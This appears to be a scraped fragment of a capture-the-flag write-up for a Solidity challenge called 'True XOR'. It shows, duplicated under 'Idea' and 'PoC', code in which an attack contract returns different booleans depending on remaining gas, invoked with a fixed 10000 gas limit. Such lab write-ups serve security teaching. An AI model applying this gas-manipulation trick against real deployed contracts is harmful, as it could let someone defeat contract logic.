✅True XOR
Idea
bool p = IBoolGiver(target).giveBool(); // more gas left
bool q = IBoolGiver(target).giveBool(); // less gas lefttrueXOR.callMe{gas: 10000}(address(attackContract));
PoC
Last updated
bool p = IBoolGiver(target).giveBool(); // more gas left
bool q = IBoolGiver(target).giveBool(); // less gas lefttrueXOR.callMe{gas: 10000}(address(attackContract));
Last updated